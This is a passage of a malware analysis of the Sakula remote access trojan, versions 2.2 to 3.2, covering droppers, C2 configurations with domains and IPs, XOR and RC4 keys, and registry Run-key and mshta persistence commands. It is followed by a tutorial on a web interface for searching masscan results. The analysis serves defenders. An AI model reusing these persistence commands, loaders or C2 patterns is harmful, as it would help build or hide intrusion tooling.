    CHAR    uri_get3_file[50];          //  script.asp
    CHAR    uri_get2_file[50];          //  /script.asp
    CHAR    uri_get3_arg[50];           //  imageid
    CHAR    copy_file_name[50];         //  MediaCenter.exe
    CHAR    autorun_key[50];            //  MicroMedia
    CHAR    copy_file_path[50];         //  %Temp%\MicroMedia
    CHAR    campaign_id[12];            //  [REMOVED]
    DWORD   waiting_time;               //  0x7530 (30000 milliseconds)
}

An example of used URIs:

  • POST /script.asp?imageid=[HASH_MACHINE_NAME]&type=[CMD_ID]&resid=[CMD_SEQ_NUM]&nmsg=up
  • GET (1) /photo/[HASH_MACHINE_NAME].jpg?resid=[CMD_SEQ_NUM]
  • GET (2) /script.asp?resid=[CMD_SEQ_NUM]&nmsg=del&photoid=[HASH_MACHINE_NAME]

v2.2 (24/09/2013)

The code of the v2.2 comes from the v2.0 with the same protection mechanisms except UPX.

blackvinev2_2_arch.png

This version is signed with the same stolen certificates as in version 2.1.

A new encryption algorithm has been implemented in the dropper. Instead of the single-byte XOR-encryption, it uses the RC4 algorithm from OpenSSL with the key goldsunfucker.

This algorithm is also implemented in Sakula with the same key to decrypt payloads, instead of the PlugX algorithm used in v2.0. This indicates that the authors of the protection mechanisms are the same as those of the Sakula RAT.

Payloads are now embedded in resource under the type RES and names 0x458 and 0x459.

Some dirty updates can be observed in the installation mechanism. The configuration system is still in place, but some hardcoded paths have been inserted and are used instead. This is the case for the malware copy path and name, the exploit drop location and name, and the autorun key. Depending on samples, there may be different values:

  • %ALLUSERPROFILE%\SensrSvc.exe
  • %ALLUSERPROFILE%\Utmm.ocx
  • SensrSvc

or

  • %APPDATA%\SensrSvc2013.exe
  • %APPDATA%\Utmm.ocx
  • SenseSvc

It uses the same configuration structure than the v2.0 and 2.1, but with different data:

struct ConfigV2_2
{
    CHAR    cc_domain[50];              //  oa.ameteksen.com:80
                                        //  login.ameteksen.com:443
    CHAR    uri_get1_folder[50];        //  /photo/
    CHAR    uri_get3_file[50];          //  script.asp
    CHAR    uri_get2_file[50];          //  /script.asp
    CHAR    uri_get3_arg[50];           //  imageid
    CHAR    copy_file_name[50];         //  MediaCenter.exe
    CHAR    autorun_key[50];            //  MicroMedia
    CHAR    copy_file_path[50];         //  %Temp%\MicroMedia
    CHAR    campaign_id[12];            //  [REMOVED]
    DWORD   waiting_time;               //  0x7530 (30000 milliseconds)
}

struct ConfigV2_2
{
    CHAR    cc_domain[50];              //  115.47.35.117
    CHAR    uri_get1_folder[50];        //  /photo/
    CHAR    uri_get3_file[50];          //  script.asp
    CHAR    uri_get2_file[50];          //  /script.asp
    CHAR    uri_get3_arg[50];           //  imageid
    CHAR    copy_file_name[50];         //  MediaCenter.exe
    CHAR    autorun_key[50];            //  MicroMedia
    CHAR    copy_file_path[50];         //  %Temp%\MicroMedia
    CHAR    campaign_id[12];            //  [REMOVED]
    DWORD   waiting_time;               //  0x7530 (30000 milliseconds)
}

An example of used URIs:

  • POST /script.asp?imageid=[HASH_MACHINE_NAME]&type=[CMD_ID]&resid=[CMD_SEQ_NUM]&nmsg=up
  • GET (1) /photo/[HASH_MACHINE_NAME].jpg?resid=[CMD_SEQ_NUM]
  • GET (2) /script.asp?resid=[CMD_SEQ_NUM]&nmsg=del&photoid=[HASH_MACHINE_NAME]

Version 3.0 to 3.2

All changes made in versions 2.x are not implemented in versions 3.x.

v3.0 (07/01/2014 & 27/02/2014)

Two samples have been found having the same code. We named them 3.0a and 3.0b. They were compiled at different dates (07/01/2014 and 27/02/2014), have a different configuration and are signed by different certificates.

Sample 3.0a is distributed through a fake installer:

blackvinev3_0a_installer.png

A protection layer has been added on the RAT with The “Go” Tools, a tool used for manipulating ASM and PE.

The layer which is located at the beginning of the section code:

  • implements some anti-sandboxing tricks
    • check with a Sleep between 2 GetTickCount if the Sleep function has not been hooked
    • check if there is a foreground window
    • check if the mouse cursor moves
  • Decrypt some Sakula known strings using the Sakula XOR algorithm (v1) with the key 0x1E
  • Decrypt the Sakula code using the Sakula XOR algorithm (v1) with the key 0x7C

It is signed with a stolen certificate, as in versions 2.x:

  • (v3.0a) Certificate issued to DTOPTOOLZ Co.,Ltd. by VeriSign Class 3 Code Signing 2010 CA

sakula_3_0a_1_cert.png

  • (v3.0b) Certificate issued to SJ SYSTEM by Thawte Code Signing CA – G2

sakula_3_0b_1_cert.png

Installation

Some changes have been made on the installation process.

It no longer uses the Windows API to create the autorun key, but uses a cmd.exe with commands:

  • cmd.exe /c reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v [AUTORUN_KEY] /t REG_SZ /d [MLWR_PATH] (if admin)
  • cmd.exe /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v [AUTORUN_KEY] /t REG_SZ /d [MLWR_PATH] (if not admin)

Sakula cannot load an external configuration from the file rss.tmp anymore.

Exploits are embedded in data, and not in resource anymore. They are encrypted with a new version of its single-byte XOR algorithm:

def decrypt_xor_v2(data, key):
    rol = lambda val, r_bits, max_bits: \
          (val << r_bits%max_bits) & (2**max_bits-1) | \
          ((val & (2**max_bits-1)) >> (max_bits-(r_bits%max_bits)))
    return "".join([chr(rol(ord(c), 1, 8) ^ key) for c in data])

The key used in this version is 0x28.

Before copying itself to another location, it modifies its 4 last bytes with the value returned by GetTickCount. This feature was present in the version 1.4 (with the last 8 bytes instead 4 last), but not in 2.0. This supports the idea that version 2.x is a fork.

It resolves some imports dynamically with GetProcAddress at its start:

  • WinExec
  • WriteFile
Commands

Command N°8 (interact through a reverse shell) has been removed.

The maximum waiting time between commands has been up to 24 hours and 1 second (0x5265C01), which is 2 milliseconds more than the old value.

The uninstall command deletes autorun keys in HKEY_CURRENT_USER and HKEY_LOCAL_MACHINE (only in HKEY_CURRENT_USER in previous versions).

Communication

A new User Agent is used: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; SV1).

Data are encrypted using the single-byte XOR algorithm v1 with the key 0x66.

From versions 1.0 to 2.2, Sakula used 3 URIs to communicate:

  • a GET request used to ask for a command from the C&C
  • a GET request used to acknowledge the received command
  • a POST request used to send back a command output

From version 3.0, the GET request used to acknowledge a command has been removed. Instead, it uses the POST request with a command ID equal to 0xFF.

It uses a new configuration structure:

struct ConfigV3_0a
{
    DWORD   nb_config;                  //  1
    DWORD   waiting_time;               //  0x7530 (30000 milliseconds)
    DWORD   unk;                        //  0
    CHAR    campaign_id[12];            //  [REMOVED]
    CHAR    copy_file_path[100] ;       //  %Temp%
    CHAR    copy_file_folder[100];      //  \MicroMedia
    CHAR    copy_file_name[50];         //  MediaCenter.exe
    CHAR    autorun_key[50];            //  MicroMedia
    DWORD   port                        //  0x1BB (443)
    CHAR    uri_post[200];              //  /view.asp?cookie=%s&type=%d&vid=%d
    CHAR    url_post[200];              //  http://www.we11point.com:443/view.asp?cookie=%s&type=%d&vid=%d
    CHAR    url_get[100];               //  http://www.we11point.com:443/photo/%s.jpg?vid=%d
    CHAR    cc_domain[100];             //  www.we11point.com
}
struct ConfigV3_0b
{
    DWORD   nb_config;                  //  1
    DWORD   waiting_time;               //  0x3A98 (15000 milliseconds)
    DWORD   unk;                        //  0
    CHAR    campaign_id[12];            //  [REMOVED]
    CHAR    copy_file_path[100] ;       //  %ALLUSERSPROFILE%
    CHAR    copy_file_folder[100];      //  \CitrixReciever
    CHAR    copy_file_name[50];         //  CitrixReciever.exe
    CHAR    autorun_key[50];            //  CitrixXenAppReciever
    DWORD   port                        //  0x50 (80)
    CHAR    uri_post[200];              //  /news/view.asp?cookie=%s&type=%d&vid=%d
    CHAR    url_post[200];              //  http://www.huchin.com/news/view.asp?cookie=%s&type=%d&vid=%d
    CHAR    url_get[100];               //  http://www.huchin.com/news/photo/%s.jpg?vid=%d
    CHAR    cc_domain[100];             //  www.huchin.com
}

An example of used URIs for v3.0a:

  • POST /view.asp?cookie=[HASH_MACHINE_NAME]&type=[CMD_ID]&vid=[CMD_SEQ_NUM]
  • GET /photo/[HASH_MACHINE_NAME].jpg?vid=[CMD_SEQ_NUM]

An example of used URIs for v3.0b:

  • POST /news/view.asp?cookie=[HASH_MACHINE_NAME]&type=[CMD_ID]&vid=[CMD_SEQ_NUM]
  • GET /news/photo/[HASH_MACHINE_NAME].jpg?vid=[CMD_SEQ_NUM]

v3.1 (16/05/2014 & 09/07/2014 & 10/07/2014 & 18/09/2014)

Many samples have been found having the same code. We can group them by compilation timestamp (16/05/2014and 09/07/2014, 10/07/2014, 18/09/2014). We named them respectively 3.1a, 3.1b, 3.1c and 3.1d. They are distributed through different installers signed by stolen certificates and have a different configuration.

Sample 3.1a is distributed through a fake installer (compiled the 23/05/2014):

blackvinev3_1a_installer.png

We don’t have the installer corresponding to the sample 3.1b.

Sample 3.1c is distributed through 2 signed fake installers (compiled the 06/08/2014 and 19/08/2014):

blackvinev3_1c_installer.png blackvinev3_1c2_installer.png

Sample 3.1d is distributed through a signed fake installer (compiled the 27/10/2014):

  • Certificate issued to Career Credit Co,.Ltd. by VeriSign Class 3 Code Signing 2010 CA

sakula_3_1d_1_cert.png

blackvinev3_1d_installer.png

In versions 3.1 and 3.2, Sakula is distributed through a dropper and is not signed with a stolen certificate anymore. It contains a legit binary (vulnerable to DLL hijacking), a rogue DLL and a Sakula embedded in a PE loader. The legit binary loads the rogue DLL which loads and executes the PE loader which loads and executes the RAT.

blackvinev3_1_arch.png

The dropper:

  • does not execute while the mouse does not move (anti-sandbox trick)
  • extracts the payload located after the tag EEEEEEEE, decrypts it, and writes it to the file %TEMP%\s.exe
  • extracts the payload located after the tag LLLLLLLL, decrypts it, and writes it to the file %TEMP%\msi.dll
  • extracts the payload located after the tag TTTTTTTT and writes it to the file %TEMP%\setup.msi
  • executes %TEMP%\s.exe
  • uninstall itself with the command ping 127.0.0.1 & del /q [PATH]

The dropper uses the same single-byte XOR-algorithm than the RAT (with the key 0x68) and the same deletion method. These facts support the assumption that it is custom-made.

The legit binary %TEMP%\s.exe is a digitally signed executable from Kaspersky Lab originally called setup.exe. ((/public/YFR/sakula_legitkasperkyexe_3_1_cert.png|sakula_legitkasperkyexe_3_1_cert.png|C|sakula_legitkasperkyexe_3_1_cert.png, Nov 2015)

The file %TEMP%\msi.dll is a simple DLL which decrypts and executes setup.msi (hardcoded). It uses the single-byte XOR-algorithm with the key 0x88.

The file %TEMP%\setup.msi is Sakula embedded in a PE loader. This PE loader is different from the PE loader used for version 2.x, but acts in the same way. It extracts the payload located after the shellcode and loads it in memory.

Installation

Some changes have been made on the installation process:

  • it injects itself in a new process created from %WINDIR%\system32\svchost.exe (3.1a -> 3.1c) or from%WINDIR%\explorer.exe (3.1d)
  • it executes its exploit with the command cmd.exe /c rundll32 [EXPLOIT_PATH] ActiveQvaw [MLWR_PATH]
  • it does not change anymore the 4 last bytes of its copy

To move itself to its new location, it moves dropped files to %Temp%\MicroSoftMedia (depending on configuration):

  • s.exe -> %Temp%\MicroSoftMedia\MediaSoft.exe
  • msi.dll -> %Temp%\MicroSoftMedia\msi.dll
  • setup.msi -> %Temp%\MicroSoftMedia\setup.msi
Communication

A new User Agent is used: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

It uses the same configuration structure than the v3.0x, but with different data:

struct ConfigV3_1a
{
    DWORD   nb_config;                  //  1
    DWORD   waiting_time;               //  0x7530 (30000 milliseconds)
    DWORD   unk;                        //  0
    CHAR    campaign_id[12];            //  [REMOVED])
    CHAR    copy_file_path[100] ;       //  %Temp%
    CHAR    copy_file_folder[100];      //  \MicroMedia
    CHAR    copy_file_name[50];         //  MediaCenter.exe
    CHAR    autorun_key[50];            //  MicroMedia
    DWORD   port                        //  0x50 (80)
    CHAR    uri_post[200];              //  /view.asp?cstring=%s&tom=%d&id=%d
    CHAR    url_post[200];              //  http://192.199.254.126/view.asp?cstring=%s&tom=%d&id=%d
    CHAR    url_get[100];               //  http://192.199.254.126/photo/%s.jpg?id=%d
    CHAR    cc_domain[100];             //  192.199.254.126
}

struct ConfigV3_1b
{
    DWORD   nb_config;                  //  1
    DWORD   waiting_time;               //  0x3A98 (15000 milliseconds)
    DWORD   unk;                        //  0
    CHAR    campaign_id[12];            //  [REMOVED]
    CHAR    copy_file_path[100] ;       //  %Temp%
    CHAR    copy_file_folder[100];      //  \MicroSoftMedia
    CHAR    copy_file_name[50];         //  MediaSoft.exe
    CHAR    autorun_key[50];            //  MicroSoftMedia
    DWORD   port                        //  0x50 (80)
    CHAR    uri_post[200];              //  /view.asp?cstring=%s&tom=%d&id=%d
    CHAR    url_post[200];              //  http://180.210.206.246/view.asp?cstring=%s&tom=%d&id=%d
    CHAR    url_get[100];               //  http://180.210.206.246/photo/%s.jpg?id=%d
    CHAR    cc_domain[100];             //  180.210.206.246
}

struct ConfigV3_1c
{
    DWORD   nb_config;                  //  1
    DWORD   waiting_time;               //  0x3A98 (15000 milliseconds)
    DWORD   unk;                        //  0
    CHAR    campaign_id[12];            //  [REMOVED]
    CHAR    copy_file_path[100] ;       //  %Temp%
    CHAR    copy_file_folder[100];      //  \JuniperACX
    CHAR    copy_file_name[50];         //  JuniperSafeACX.exe
    CHAR    autorun_key[50];            //  JuniperSafeACX
    DWORD   port                        //  0x50 (80)
    CHAR    uri_post[200];              //  /view.asp?cstring=%s&tom=%d&id=%d
    CHAR    url_post[200];              //  http://23.27.112.143/view.asp?cstring=%s&tom=%d&id=%d
    CHAR    url_get[100];               //  http://23.27.112.143/photo/%s.jpg?id=%d
    CHAR    cc_domain[100];             //  23.27.112.143
}

struct ConfigV3_1c
{
    DWORD   nb_config;                  //  1
    DWORD   waiting_time;               //  0x3A98 (15000 milliseconds)
    DWORD   unk;                        //  0
    CHAR    campaign_id[12];            //  [REMOVED]t
    CHAR    copy_file_path[100] ;       //  %Temp%
    CHAR    copy_file_folder[100];      //  \MicroMedia
    CHAR    copy_file_name[50];         //  MediaCenter.exe
    CHAR    autorun_key[50];            //  MicroMedia
    DWORD   port                        //  0x50 (80)
    CHAR    uri_post[200];              //  /view.asp?cstring=%s&tom=%d&id=%d
    CHAR    url_post[200];              //  http://23.226.65.197/view.asp?cstring=%s&tom=%d&id=%d
    CHAR    url_get[100];               //  http://23.226.65.197/photo/%s.jpg?id=%d
    CHAR    cc_domain[100];             //  23.226.65.197
}

struct ConfigV3_1d
{
    DWORD   nb_config;                  //  1
    DWORD   waiting_time;               //  0x7530 (30000 milliseconds)
    DWORD   unk;                        //  0
    CHAR    campaign_id[12];            //  [REMOVED]
    CHAR    copy_file_path[100] ;       //  %Temp%
    CHAR    copy_file_folder[100];      //  \MicroMedia
    CHAR    copy_file_name[50];         //  MediaCenter.exe
    CHAR    autorun_key[50];            //  MicroMedia
    DWORD   port                        //  0x50 (80)
    CHAR    uri_post[200];              //  /view.asp?cstring=%s&tom=%d&id=%d
    CHAR    url_post[200];              //  http://www.xha-mster.com/view.asp?cstring=%s&tom=%d&id=%d
    CHAR    url_get[100];               //  http://www.xha-mster.com/photo/%s.jpg?id=%d
    CHAR    cc_domain[100];             //  www.xha-mster.com
}

An example of used URIs:

  • POST /view.asp?cstring=[HASH_MACHINE_NAME]&tom=[CMD_ID]&id=[CMD_SEQ_NUM]
  • GET /photo/[HASH_MACHINE_NAME].jpg?id=[CMD_SEQ_NUM]

v3.2 (09/01/2015)

Version 3.2 is distributed through a signed fake installer (compiled the 15/01/2015):

  • Certificate issued to U-Tech IY Service by SGTRUST CODE SIGNING CA

sakula_3_2_cert.png

blackvinev3_2_installer.png

blackvinev3_2_arch.png

The dropper has been adapted to launch a DLL:

  • does not execute while the mouse does not move (anti-sandbox trick)
  • extracts the payload located after the tag NNNNNNNN, decrypts it, and writes it to the file %TEMP%\Emabout.dll
  • extracts the payload located after the tag AAAAAAAA, decrypts it, and writes it to the file %TEMP%\shutil.dll
  • extracts the payload located after the tag BBBBBBBB and writes it to the file %TEMP%\Thumbs.db
  • executes %TEMP%\Emabout.dll with the command rundll32.exe [%TEMP%]\Emabout.dll CloseAbout
  • uninstall itself with the command ping 127.0.0.1 & del /q [PATH]

The XOR key used to encrypt payloads has been changed and is now equals to 0x18.

The legit binary %TEMP%\Emabout.dll is a digitally signed executable from McAfee (Virus Scan Entreprise v8.7.0.570).

sakula_legitmcaffeeexe_3_2_cert.png

The file %TEMP%\shutil.dll is a simple DLL which decrypts and executes Thumbs.db (hardcoded). It uses the single-byte XOR-algorithm with the key 0x88.

The PE loader is the same than the v3.1.

Installation

Some changes have been made on the installation process. Sakula does not drop exploits anymore when the user does not have administrator rights. This feature has been dirtily removed. The code is still present but never executed (a return or goto has been placed at the beginning of the function).

To move itself to its new location, it moves dropped files to %Temp%\MicroWhoKnow (given in configuration):

  • Emabout.dll -> %Temp%\MicroWhoKnow\MicroWhoKnow.dll
  • shutil.dll -> %Temp%\MicroWhoKnow\shutil.dll
  • Thumbs.db -> %Temp%\MicroWhoKnow\Thumbs.db

Then it sets up autorun keys pointing to %Temp%\MicroWhoKnow\MicroWhoKnow.dll using cmd.exe with commands:

  • cmd.exe /c reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v “MicroWhoknow” /t REG_SZ /d “mshta vbscript:CreateObject(\”WScript.Shell\”).Run(\”cmd /c cd %Temp%\MicroWhoknow “&&” rundll32 MicroWhoknow.dll Plugupdate”,0) (window.close)” (if admin)
  • cmd.exe /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v “MicroWhoknow” /t REG_SZ /d “mshta vbscript:CreateObject(\”WScript.Shell\”).Run(\”cmd /c cd %Temp%\MicroWhoknow “&&” rundll32 MicroWhoknow.dll Plugupdate”,0) (window.close)” (if not admin)

The command used in previous versions 3.0 and 3.1 to set up autorun keys is still present in data, but never used:

  • cmd.exe /c reg add %s\Software0\Microsoft\Windows\CurrentVersion\Run /v “%s” /t REG_SZ /d “rundll32 \”%s\” PlugUpdate”

It uses the same configuration structure than the v3.0 and v3.1, but with different data:

struct ConfigV3_2
{
    DWORD   nb_config;                  //  1
    DWORD   waiting_time;               //  0x2710 (10000 milliseconds)
    DWORD   unk;                        //  0
    CHAR    campaign_id[12];            //  [REMOVED]
    CHAR    copy_file_path[100] ;       //  %Temp%
    CHAR    copy_file_folder[100];      //  \MicroWhoknow
    CHAR    copy_file_name[50];         //  MicroWhoknow.dll
    CHAR    autorun_key[50];            //  MicroWhoknow
    DWORD   port                        //  0x50 (80)
    CHAR    uri_post[200];              //  /update.asp?cstring=%s&tom=%d&id=%d
    CHAR    url_post[200];              //  http://104.128.233.4/update.asp?cstring=%s&tom=%d&id=%d
    CHAR    url_get[100];               //  http://104.128.233.4/x0x/%s.jpg?id=%d
    CHAR    cc_domain[100];             //  104.128.233.4
}

An example of used URIs:

  • POST /update.asp?cstring=[HASH_MACHINE_NAME]&tom=[CMD_ID]&id=[CMD_SEQ_NUM]
  • GET /x0x/[HASH_MACHINE_NAME].jpg?id=[CMD_SEQ_NUM]

This is the end of this long blogspot on 2.x and 3.x Sakula. This is probably not the last one, so keep in touch !

Original Post: http://blog.airbuscybersecurity.com/post/2015/10/Malware-Sakula-Evolutions-%28Part-2/2%29

MASSCAN Web Interface

A couple of weeks ago, we had the opportunity to scan and map a large IP address space covering just over 3 million hosts. Our tool of choice for this was the fast and capable masscan, which is packaged in Kali. While masscan has several convenient output formats, such as binary and XML, one feature we were missing was an easy way to search our results. We quickly whipped up a little web interface that would allow us to import and search within a masscan XML output file. This feature proved very useful for us – as once we identified a specific vulnerable pattern on a machine, we could easily cross reference this pattern with over the millions of discovered hosts in our database.

Setting up the MASSCAN Web Application

The setup of the masscan web user interface is pretty standard and straightforward. You will need to create a MySQL database, import the database schema, plop the PHP files under your web root, and edit the config file with the correct details. Here’s what this process would look like.

First, install and setup your web server and some other required packages, checkout a copy of the masscan-web-ui repository, and copy over the MASSCAN web ui files to the web root:

root@kali:~# apt-get install apache2 php5 php5-mysql mysql-server
root@kali:~# systemctl start mysql
root@kali:~# systemctl start apache2
root@kali:~# git clone https://github.com/offensive-security/masscan-web-ui
root@kali:~# mv masscan-web-ui/* /var/www/html/
root@kali:~# cd /var/www/html/

Next, you’ll need to create a MySQL database and user for the web application and then import the masscan database schema.

root@kali:/var/www/html# mysql -u root -p
Enter password:
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the current input statement.

mysql> create database masscan;
Query OK, 1 row affected (0.01 sec)

mysql> CREATE USER ‘masscan’@’localhost’ IDENTIFIED BY ‘changem3’;
Query OK, 0 rows affected (0.00 sec)

mysql>GRANT ALL PRIVILEGES ON masscan.* TO ‘masscan’@’localhost’;
Query OK, 0 rows affected (0.01 sec)

mysql> exit
Bye
root@kali:/var/www/html# mysql -u root -p masscan < db-structure.sql
Enter password:
root@kali:/var/www/html# rm db-structure.sql README.md

Lastly, you need to update the web configuration file with the MySQL user and database information that you configured above.

nano includes/config.php

define(‘DB_DRIVER’, ‘MySQL’);
define(‘DB_HOST’, ‘localhost’);
define(‘DB_USERNAME’, ‘masscan’);
define(‘DB_PASSWORD’, ‘changem3’);
define(‘DB_DATABASE’, ‘masscan’);

With everything configured, you can now use masscan to scan your targets with the banner checking option, while specifying an XML output format for the results. More information about banner grabbing with masscan can be found on the masscan GitHub page.

masscan 10.0.0.0/8 -p80,21,53 –banners –source-ip 10.0.0.2 –max-rate 100000 -oX scan-01.xml

Once all of the scans have been completed, it’s time to import the scan results. In this example, we imported the results of two class A scans, while choosing to clear the database when importing the first results file.

root@kali:/var/www/html# ls -l scan*
-rw-r–r– 1 root root 212929324 Dec 1 13:23 scan-01.xml
-rw-r–r– 1 root root 700816226 Dec 1 13:55 scan-02.xml
root@kali:/var/www/html# php import.php scan-01.xml

Do you want to clear the database before importing (yes/no)?: yes

Clearing the db
Reading file
Parsing file
Processing data (This may take some time depending on file size)

Summary:
Total records:738279
Inserted records:738279
Took about:3 minutes,18 seconds
root@kali:/var/www/html# php import.php scan-02.xml

Do you want to clear the database before importing (yes/no)?: no
Reading file
Parsing file
Processing data (This may take some time depending on file size)

Summary:
Total records:2411974
Inserted records:2411974
Took about:9 minutes,41 seconds
root@kali:/var/www/html#

All that remains is to browse to the web application with a total of more than 3 million results now easily searchable.

For more information and to try out the masscan-web-ui for yourself, you can check out our GitHub project page.

masscan-webui

 

Original Post: https://www.offensive-security.com/offsec/masscan-web-interface/

Up ↑